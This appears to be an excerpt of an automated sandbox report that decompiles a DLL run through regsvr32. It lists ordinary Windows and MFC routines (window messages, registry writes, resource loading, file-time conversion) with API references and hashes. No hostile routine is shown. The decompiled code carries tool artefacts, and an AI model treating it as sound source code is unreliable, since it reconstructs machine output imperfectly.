                                                                                                                • Instruction Fuzzy Hash: 3711BF74504B15EFD710DF51C8C9BAAB3F8FF012A5F108059E94257954D3B4ED80DBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 95%
                                                                                                                			E10019C28(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				void* _t37;
                                                                                                                				intOrPtr _t43;
                                                                                                                				void* _t45;
                                                                                                                				intOrPtr* _t51;
                                                                                                                				void* _t52;
                                                                                                                				void* _t53;
                                                                                                                
                                                                                                                				_t53 = __eflags;
                                                                                                                				_t46 = __ecx;
                                                                                                                				_t44 = __ebx;
                                                                                                                				_push(4);
                                                                                                                				E1004764D(0x1008ed88, __ebx, __edi, __esi);
                                                                                                                				_t51 = __ecx;
                                                                                                                				 *((intOrPtr*)(_t52 - 0x10)) = __ecx;
                                                                                                                				E1001A40B(__ebx, __ecx, __edi, __ecx, _t53);
                                                                                                                				_t54 =  *((intOrPtr*)(_t52 + 8));
                                                                                                                				 *((intOrPtr*)(_t52 - 4)) = 0;
                                                                                                                				 *_t51 = 0x1009c6f4;
                                                                                                                				if( *((intOrPtr*)(_t52 + 8)) == 0) {
                                                                                                                					 *((intOrPtr*)(_t51 + 0x50)) = 0;
                                                                                                                				} else {
                                                                                                                					_t43 = E1004C810( *((intOrPtr*)(_t52 + 8)));
                                                                                                                					_pop(_t46);
                                                                                                                					 *((intOrPtr*)(_t51 + 0x50)) = _t43;
                                                                                                                				}
                                                                                                                				_t45 = E1001E302(_t44, 0, _t51, _t54);
                                                                                                                				_t55 = _t45;
                                                                                                                				if(_t45 == 0) {
                                                                                                                					L4:
                                                                                                                					E1000A069(_t45, _t46, 0, _t51, _t55);
                                                                                                                				}
                                                                                                                				_t7 = _t45 + 0x74; // 0x74
                                                                                                                				_t46 = _t7;
                                                                                                                				_t37 = E1001988F(_t45, _t7, 0, _t51, _t55);
                                                                                                                				if(_t37 == 0) {
                                                                                                                					goto L4;
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)(_t37 + 4)) = _t51;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x2c)) = GetCurrentThread();
                                                                                                                				 *((intOrPtr*)(_t51 + 0x30)) = GetCurrentThreadId();
                                                                                                                				 *((intOrPtr*)(_t45 + 4)) = _t51;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x44)) = 0;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x7c)) = 0;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x64)) = 0;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x68)) = 0;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x54)) = 0;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x60)) = 0;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x88)) = 0;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x58)) = 0;
                                                                                                                				 *((short*)(_t51 + 0x92)) = 0;
                                                                                                                				 *((short*)(_t51 + 0x90)) = 0;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x48)) = 0;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x8c)) = 0;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x80)) = 0;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x84)) = 0;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x70)) = 0;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x74)) = 0;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x94)) = 0;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x9c)) = 0;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x5c)) = 0;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x6c)) = 0;
                                                                                                                				 *((intOrPtr*)(_t51 + 0x98)) = 0x200;
                                                                                                                				return E10047725(_t51);
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 10019C2F
                                                                                                                  • Part of subcall function 1001A40B: __EH_prolog3.LIBCMT ref: 1001A412
                                                                                                                • __strdup.LIBCMT ref: 10019C51
                                                                                                                • GetCurrentThread.KERNEL32(00000004,10002EB9,00000000), ref: 10019C7E
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 10019C87
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentH_prolog3Thread$__strdup
                                                                                                                • String ID:
                                                                                                                • API String ID: 4206445780-0
                                                                                                                • Opcode ID: c3b3984c62bacbd36d5cc92ad9ca2300cd357f5d6ec69e28e01614a3e862823a
                                                                                                                • Instruction ID: 08193193464e78a0f338aeecd604293388332540e588b7c863b14edbaf8c935c
                                                                                                                • Opcode Fuzzy Hash: c3b3984c62bacbd36d5cc92ad9ca2300cd357f5d6ec69e28e01614a3e862823a
                                                                                                                • Instruction Fuzzy Hash: 882190B0800B508FD321DF2A854524AFBE8FFA0740F10891FE5AA87622CBB0A481DF44
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 86%
                                                                                                                			E10043F4D(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				int _v8;
                                                                                                                				int _t21;
                                                                                                                				intOrPtr _t32;
                                                                                                                				int _t36;
                                                                                                                				void* _t46;
                                                                                                                
                                                                                                                				_push(__ecx);
                                                                                                                				_push(__ecx);
                                                                                                                				_t46 = __ecx;
                                                                                                                				_t36 = _a4 -  *((intOrPtr*)(__ecx + 4));
                                                                                                                				_t21 = _a8 -  *((intOrPtr*)(__ecx + 8));
                                                                                                                				_v8 = _t21;
                                                                                                                				OffsetRect(__ecx + 0x28, _t36, _t21);
                                                                                                                				OffsetRect(_t46 + 0x48, _t36, _v8);
                                                                                                                				OffsetRect(_t46 + 0x38, _t36, _v8);
                                                                                                                				OffsetRect(_t46 + 0x58, _t36, _v8);
                                                                                                                				_t48 =  *((intOrPtr*)(_t46 + 0x80));
                                                                                                                				 *((intOrPtr*)(_t46 + 4)) = _a4;
                                                                                                                				 *((intOrPtr*)(_t46 + 8)) = _a8;
                                                                                                                				if( *((intOrPtr*)(_t46 + 0x80)) == 0) {
                                                                                                                					_t32 = E100439DF();
                                                                                                                				} else {
                                                                                                                					_t32 = 0;
                                                                                                                				}
                                                                                                                				 *((intOrPtr*)(_t46 + 0x74)) = _t32;
                                                                                                                				return E10043DEE(_t46, _t48, 0);
                                                                                                                			}









                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: OffsetRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 177026234-0
                                                                                                                • Opcode ID: 10ba8cf307fc1ee194453d2be39fa243ce68c423d7bb49e5b94edb7717c06be9
                                                                                                                • Instruction ID: ad087f104e08c8dc69baa1358e980ee4299902bd1e2e8011736340b443768c7d
                                                                                                                • Opcode Fuzzy Hash: 10ba8cf307fc1ee194453d2be39fa243ce68c423d7bb49e5b94edb7717c06be9
                                                                                                                • Instruction Fuzzy Hash: 19110C71A00709AFDB10DFA9C985D9BB7ECEB48254B10882AF54AD7610D670FE449B60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 94%
                                                                                                                			E10025FFB(void* __ecx, intOrPtr __edx, CHAR* _a4, char* _a8, char _a12) {
                                                                                                                				signed int _v8;
                                                                                                                				char _v24;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t13;
                                                                                                                				CHAR* _t21;
                                                                                                                				char* _t24;
                                                                                                                				intOrPtr _t28;
                                                                                                                				void* _t30;
                                                                                                                				signed int _t31;
                                                                                                                
                                                                                                                				_t28 = __edx;
                                                                                                                				_t13 =  *0x100b9e70; // 0xbb35530
                                                                                                                				_v8 = _t13 ^ _t31;
                                                                                                                				_t24 = _a8;
                                                                                                                				_t30 = __ecx;
                                                                                                                				_t29 = _a4;
                                                                                                                				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
                                                                                                                					E1004C19A( &_v24, 0x10, 0x1009d478, _a12);
                                                                                                                					_t18 = WritePrivateProfileStringA(_t29, _t24,  &_v24,  *(__ecx + 0x68));
                                                                                                                				} else {
                                                                                                                					_t30 = E10025F4C(__ecx, _t29);
                                                                                                                					if(_t30 != 0) {
                                                                                                                						_t21 = RegSetValueExA(_t30, _t24, 0, 4,  &_a12, 4);
                                                                                                                						_t29 = _t21;
                                                                                                                						RegCloseKey(_t30);
                                                                                                                						_t18 = 0 | _t21 == 0x00000000;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return E1004763E(_t18, _t24, _v8 ^ _t31, _t28, _t29, _t30);
                                                                                                                			}















                                                                                                                APIs
                                                                                                                • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 10026034
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 1002603D
                                                                                                                • _swprintf.LIBCMT ref: 1002605A
                                                                                                                • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1002606B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClosePrivateProfileStringValueWrite_swprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 4210924919-0
                                                                                                                • Opcode ID: ecc0c1e1ae1d5184763d5de5863195a65147cc483bfe43b30b9c9aca3f2aaf1c
                                                                                                                • Instruction ID: e1688f579dca54ba37b2dca936e62701f3f568ae60a6af65198550ab68664cd0
                                                                                                                • Opcode Fuzzy Hash: ecc0c1e1ae1d5184763d5de5863195a65147cc483bfe43b30b9c9aca3f2aaf1c
                                                                                                                • Instruction Fuzzy Hash: B001A976500219ABEB10EF688D81FAFB3ACEB09604F50056AFA01E7181DA74FD0497A4
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 84%
                                                                                                                			E100163C0(intOrPtr* __ecx) {
                                                                                                                				char _v20;
                                                                                                                				intOrPtr _v32;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				intOrPtr* __esi;
                                                                                                                				struct HWND__* _t18;
                                                                                                                				void* _t24;
                                                                                                                				intOrPtr _t29;
                                                                                                                				intOrPtr* _t33;
                                                                                                                
                                                                                                                				_t28 = __ecx;
                                                                                                                				_push(0);
                                                                                                                				_t33 = __ecx;
                                                                                                                				if( *((intOrPtr*)( *__ecx + 0x120))() != 0) {
                                                                                                                					__eax =  *__esi;
                                                                                                                					__ecx = __esi;
                                                                                                                					__eax =  *((intOrPtr*)( *__esi + 0x170))();
                                                                                                                				}
                                                                                                                				_t30 = SendMessageA;
                                                                                                                				SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
                                                                                                                				E10014BE6(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
                                                                                                                				_t28 = _t33;
                                                                                                                				_t33 = E10015912(0, _t28, SendMessageA);
                                                                                                                				if(_t33 != 0) {
                                                                                                                					SendMessageA( *(_t33 + 0x20), 0x1f, 0, 0);
                                                                                                                					E10014BE6(0, _t28,  *(_t33 + 0x20), 0x1f, 0, 0, 1, 1);
                                                                                                                					_t18 = GetCapture();
                                                                                                                					if(_t18 != 0) {
                                                                                                                						_t18 = SendMessageA(_t18, 0x1f, 0, 0);
                                                                                                                					}
                                                                                                                					return _t18;
                                                                                                                				} else {
                                                                                                                					_push(_t28);
                                                                                                                					_v20 = 0x100b8618;
                                                                                                                					L10048E48( &_v20, 0x100aff30);
                                                                                                                					asm("int3");
                                                                                                                					_push(4);
                                                                                                                					E1004764D(0x1008dd26, 0, SendMessageA, _t33);
                                                                                                                					_t29 = E10020454(0x104);
                                                                                                                					_v32 = _t29;
                                                                                                                					_t24 = 0;
                                                                                                                					_v20 = 0;
                                                                                                                					if(_t29 != 0) {
                                                                                                                						_t24 = E1001DB72(_t29);
                                                                                                                					}
                                                                                                                					return E10047725(_t24);
                                                                                                                				}
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • SendMessageA.USER32 ref: 100163EA
                                                                                                                • SendMessageA.USER32 ref: 10016415
                                                                                                                  • Part of subcall function 10014BE6: GetTopWindow.USER32(?), ref: 10014BF4
                                                                                                                • GetCapture.USER32 ref: 10016427
                                                                                                                • SendMessageA.USER32 ref: 10016436
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$CaptureWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 729421689-0
                                                                                                                • Opcode ID: a0efcb6364b0c9d389cf4b23c1236720dfbb6099423cd28568ba9601b1c5d6f1
                                                                                                                • Instruction ID: 614349e7e5f11e2e6eee7cd7448c617cf19cc0822f6615fa638ab2828d8a9c26
                                                                                                                • Opcode Fuzzy Hash: a0efcb6364b0c9d389cf4b23c1236720dfbb6099423cd28568ba9601b1c5d6f1
                                                                                                                • Instruction Fuzzy Hash: 420184B5354619BFF6306B208CC9FBA76ADFB8C785F020174F285AA1A2C6A1DC405560
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 91%
                                                                                                                			E1001CB39(intOrPtr* __ecx, intOrPtr _a4, CHAR* _a8, intOrPtr _a12) {
                                                                                                                				void* _v8;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				void* _t18;
                                                                                                                				struct HRSRC__* _t25;
                                                                                                                				void* _t28;
                                                                                                                				intOrPtr* _t34;
                                                                                                                				void* _t36;
                                                                                                                				intOrPtr _t37;
                                                                                                                				struct HINSTANCE__* _t39;
                                                                                                                
                                                                                                                				_push(__ecx);
                                                                                                                				_t28 = 0;
                                                                                                                				_t40 = _a8;
                                                                                                                				_push(_t36);
                                                                                                                				_t34 = __ecx;
                                                                                                                				_v8 = 0;
                                                                                                                				if(_a8 == 0) {
                                                                                                                					L4:
                                                                                                                					_t37 = _a4;
                                                                                                                					_a8 = 1;
                                                                                                                					if(_t28 != 0) {
                                                                                                                						_a8 =  *((intOrPtr*)( *_t34 + 0x20))(_t37, _t28, _a12);
                                                                                                                						if(_v8 != 0) {
                                                                                                                							FreeResource(_v8);
                                                                                                                						}
                                                                                                                					}
                                                                                                                					if( *((intOrPtr*)(_t37 + 0x4c)) != 0) {
                                                                                                                						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x4c)))) + 0xa0))(_a12);
                                                                                                                					}
                                                                                                                					_t18 = _a8;
                                                                                                                					L10:
                                                                                                                					return _t18;
                                                                                                                				}
                                                                                                                				_t39 =  *(E1001E302(0, __ecx, _t36, _t40) + 0xc);
                                                                                                                				_t25 = FindResourceA(_t39, _a8, 0xf0);
                                                                                                                				if(_t25 == 0) {
                                                                                                                					goto L4;
                                                                                                                				}
                                                                                                                				_t18 = LoadResource(_t39, _t25);
                                                                                                                				_v8 = _t18;
                                                                                                                				if(_t18 == 0) {
                                                                                                                					goto L10;
                                                                                                                				}
                                                                                                                				_t28 = LockResource(_t18);
                                                                                                                				goto L4;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • FindResourceA.KERNEL32 ref: 1001CB5D
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 1001CB69
                                                                                                                • LockResource.KERNEL32(00000000), ref: 1001CB77
                                                                                                                • FreeResource.KERNEL32(00000000), ref: 1001CBA5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindFreeLoadLock
                                                                                                                • String ID:
                                                                                                                • API String ID: 1078018258-0
                                                                                                                • Opcode ID: 18def020212d88c321c3418ad1c96af0b5642cd8fc256225538c1a3f4ae99b45
                                                                                                                • Instruction ID: 84066b9d9097212c52bf90a2407faf13656e6ac50be94e272473e2b97754f03b
                                                                                                                • Opcode Fuzzy Hash: 18def020212d88c321c3418ad1c96af0b5642cd8fc256225538c1a3f4ae99b45
                                                                                                                • Instruction Fuzzy Hash: 83112575600218EFDB00CFA5C889E9E7BA9EF06391F0080A9F9059B260CB75DD40CF60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1001F85F(void* __ebx, void* __edi, void* __eflags, struct HWND__* _a4, intOrPtr _a8, long* _a12) {
                                                                                                                				int _t32;
                                                                                                                				intOrPtr* _t34;
                                                                                                                
                                                                                                                				_t34 = _a4;
                                                                                                                				E1001ECA1(__ebx, _t34, _a8);
                                                                                                                				E100176B3( *((intOrPtr*)(_t34 + 4)), _a8,  &_a4);
                                                                                                                				if( *_t34 == 0) {
                                                                                                                					return SendMessageA(_a4, 0x18c, 0xffffffff,  *_a12);
                                                                                                                				}
                                                                                                                				_t32 = SendMessageA(_a4, 0x188, 0, 0);
                                                                                                                				if(_t32 == 0xffffffff) {
                                                                                                                					L100011D1(_a12);
                                                                                                                				} else {
                                                                                                                					SendMessageA(_a4, 0x189, _t32, E100103E6(_a12, SendMessageA(_a4, 0x18a, _t32, 0)));
                                                                                                                				}
                                                                                                                				return E1000FED3(_a12, 0xffffffff);
                                                                                                                			}

                                                                                                                APIs
                                                                                                                  • Part of subcall function 100176B3: GetDlgItem.USER32(?,?), ref: 100176C0
                                                                                                                • SendMessageA.USER32 ref: 1001F897
                                                                                                                • SendMessageA.USER32 ref: 1001F8AB
                                                                                                                • SendMessageA.USER32 ref: 1001F8C0
                                                                                                                • SendMessageA.USER32 ref: 1001F8E8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Item
                                                                                                                • String ID:
                                                                                                                • API String ID: 3888421826-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 72%
                                                                                                                			E10001136(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				int _t26;
                                                                                                                				short* _t37;
                                                                                                                				void* _t41;
                                                                                                                				int _t44;
                                                                                                                				void* _t45;
                                                                                                                
                                                                                                                				E100476B6(0x1008d877, __ebx, __edi, __esi);
                                                                                                                				_t37 =  *(_t45 + 0x10);
                                                                                                                				 *(_t45 - 0x9c) =  *(_t45 + 0x18);
                                                                                                                				 *(_t45 - 0x94) = 0;
                                                                                                                				 *((intOrPtr*)(_t45 - 4)) = 0;
                                                                                                                				_t26 =  *0x100bb480(0x90);
                                                                                                                				_t41 = WideCharToMultiByte;
                                                                                                                				 *(_t45 - 0x98) = WideCharToMultiByte(_t26, 0, _t37,  *(_t45 + 0x14), 0, 0, 0, 0);
                                                                                                                				L100013D9(_t45 - 0x94, _t27);
                                                                                                                				WideCharToMultiByte( *0x100bb480(), 0, _t37,  *(_t45 + 0x14),  *(_t45 - 0x94),  *(_t45 - 0x98), 0, 0);
                                                                                                                				if( *(_t45 + 0x14) == 0xffffffff) {
                                                                                                                					 *(_t45 - 0x98) =  *(_t45 - 0x98) | 0xffffffff;
                                                                                                                				}
                                                                                                                				_t44 = GetStringTypeA( *(_t45 + 8),  *(_t45 + 0xc),  *(_t45 - 0x94),  *(_t45 - 0x98),  *(_t45 - 0x9c));
                                                                                                                				_t32 = _t45 - 0x90;
                                                                                                                				if( *(_t45 - 0x94) != _t45 - 0x90) {
                                                                                                                					L10001456(_t32, _t45 - 0x94);
                                                                                                                				}
                                                                                                                				return E10047739(_t37, _t41, _t44);
                                                                                                                			}








                                                                                                                APIs
                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 10002C26
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 10002C58
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000), ref: 10002C86
                                                                                                                • GetStringTypeA.KERNEL32(?,?,?,?,?), ref: 10002CAD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$H_prolog3_StringType
                                                                                                                • String ID:
                                                                                                                • API String ID: 4071876553-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 73%
                                                                                                                			E10035D3C(void* __ecx, intOrPtr __edx, void* __eflags) {
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t19;
                                                                                                                				void* _t32;
                                                                                                                				intOrPtr _t33;
                                                                                                                				intOrPtr _t39;
                                                                                                                				void* _t40;
                                                                                                                				intOrPtr* _t41;
                                                                                                                				intOrPtr _t42;
                                                                                                                				intOrPtr _t45;
                                                                                                                				signed int _t46;
                                                                                                                				void* _t48;
                                                                                                                				void* _t51;
                                                                                                                
                                                                                                                				_t51 = __eflags;
                                                                                                                				_t39 = __edx;
                                                                                                                				_t34 = __ecx;
                                                                                                                				_t46 = _t48 - 0x90;
                                                                                                                				_t19 =  *0x100b9e70; // 0xbb35530
                                                                                                                				 *(_t46 + 0x8c) = _t19 ^ _t46;
                                                                                                                				_t32 =  *(_t46 + 0x98);
                                                                                                                				_push(_t40);
                                                                                                                				E10013FEA(_t32, _t34, _t46, SetActiveWindow( *(__ecx + 0x20)));
                                                                                                                				 *((intOrPtr*)(_t46 - 0x80)) = DragQueryFileA(_t32, 0xffffffff, 0, 0);
                                                                                                                				_t25 = E1001E302(_t32, _t40, DragQueryFileA, _t51);
                                                                                                                				 *(_t46 - 0x7c) =  *(_t46 - 0x7c) & 0x00000000;
                                                                                                                				_t41 =  *((intOrPtr*)(_t25 + 4));
                                                                                                                				if( *((intOrPtr*)(_t46 - 0x80)) > 0) {
                                                                                                                					do {
                                                                                                                						DragQueryFileA(_t32,  *(_t46 - 0x7c), _t46 - 0x78, 0x104);
                                                                                                                						 *((intOrPtr*)( *_t41 + 0x88))(_t46 - 0x78);
                                                                                                                						 *(_t46 - 0x7c) =  *(_t46 - 0x7c) + 1;
                                                                                                                						_t25 =  *(_t46 - 0x7c);
                                                                                                                					} while ( *(_t46 - 0x7c) <  *((intOrPtr*)(_t46 - 0x80)));
                                                                                                                				}
                                                                                                                				DragFinish(_t32);
                                                                                                                				_pop(_t42);
                                                                                                                				_pop(_t45);
                                                                                                                				_pop(_t33);
                                                                                                                				return E1004763E(_t25, _t33,  *(_t46 + 0x8c) ^ _t46, _t39, _t42, _t45);
                                                                                                                			}


















                                                                                                                APIs
                                                                                                                • SetActiveWindow.USER32(?), ref: 10035D65
                                                                                                                • DragQueryFileA.SHELL32(?,000000FF,00000000,00000000,00000000), ref: 10035D7E
                                                                                                                • DragQueryFileA.SHELL32(?,?,?,00000104), ref: 10035DA2
                                                                                                                • DragFinish.SHELL32(?), ref: 10035DBE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Drag$FileQuery$ActiveFinishWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 892977027-0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 82%
                                                                                                                			E10039067(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a4, struct _FILETIME* _a8) {
                                                                                                                				struct _FILETIME _v12;
                                                                                                                				struct _SYSTEMTIME _v28;
                                                                                                                				char _v36;
                                                                                                                				intOrPtr _v48;
                                                                                                                				void* __ebp;
                                                                                                                				short _t24;
                                                                                                                				int _t27;
                                                                                                                				int _t29;
                                                                                                                				intOrPtr _t38;
                                                                                                                				intOrPtr _t48;
                                                                                                                				void* _t55;
                                                                                                                				void* _t58;
                                                                                                                
                                                                                                                				_t49 = __edi;
                                                                                                                				_t40 = __ebx;
                                                                                                                				_t55 = _t58;
                                                                                                                				if(_a8 != 0) {
                                                                                                                					_push(__esi);
                                                                                                                					_v28.wYear = L10038E4E();
                                                                                                                					_v28.wMonth = L10038E6E();
                                                                                                                					_v28.wDay = L10038E8A();
                                                                                                                					_v28.wHour = L10038EA5();
                                                                                                                					_v28.wMinute = L10038EC1();
                                                                                                                					_t24 = L10038EDD();
                                                                                                                					_v28.wMilliseconds = _v28.wMilliseconds & 0x00000000;
                                                                                                                					_v28.wSecond = _t24;
                                                                                                                					_t27 = SystemTimeToFileTime( &_v28,  &_v12);
                                                                                                                					_t52 = GetLastError;
                                                                                                                					if(_t27 == 0) {
                                                                                                                						E10034B40(__ebx, __edi, GetLastError, _t55, GetLastError(), 0);
                                                                                                                					}
                                                                                                                					_t29 = LocalFileTimeToFileTime( &_v12, _a8);
                                                                                                                					if(_t29 == 0) {
                                                                                                                						_t29 = E10034B40(_t40, _t49, _t52, _t55, GetLastError(), _t29);
                                                                                                                					}
                                                                                                                					return _t29;
                                                                                                                				} else {
                                                                                                                					_push(_t55);
                                                                                                                					_push(__ecx);
                                                                                                                					_v36 = 0x100b8618;
                                                                                                                					L10048E48( &_v36, 0x100aff30);
                                                                                                                					asm("int3");
                                                                                                                					_push(4);
                                                                                                                					E1004764D(0x1008dd26, __ebx, __edi, __esi);
                                                                                                                					_t48 = E10020454(0x104);
                                                                                                                					_v48 = _t48;
                                                                                                                					_t38 = 0;
                                                                                                                					_v36 = 0;
                                                                                                                					if(_t48 != 0) {
                                                                                                                						_t38 = E1001DB72(_t48);
                                                                                                                					}
                                                                                                                					return E10047725(_t38);
                                                                                                                				}
                                                                                                                			}
















                                                                                                                APIs
                                                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 100390CB
                                                                                                                • GetLastError.KERNEL32(00000000), ref: 100390DD
                                                                                                                • LocalFileTimeToFileTime.KERNEL32(?,00000000), ref: 100390EC
                                                                                                                • GetLastError.KERNEL32(00000000), ref: 100390F7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Time$File$ErrorLast$LocalSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 1172841412-0
                                                                                                                • Opcode ID: de3799fe8e6c6327c776a7fcbf3e4f48c8dcf660d1fd7f7295f13f42e1e2f09e
                                                                                                                • Instruction ID: 5c356f81747dbbd8dc38ca80da6bd8a9e3226f835241aec0ff8917524533ee0f
                                                                                                                • Opcode Fuzzy Hash: de3799fe8e6c6327c776a7fcbf3e4f48c8dcf660d1fd7f7295f13f42e1e2f09e
                                                                                                                • Instruction Fuzzy Hash: B9019228E10359AEDF12EBF58845ADE7BBCEF04651F004086E801AF241EF74E74487D9
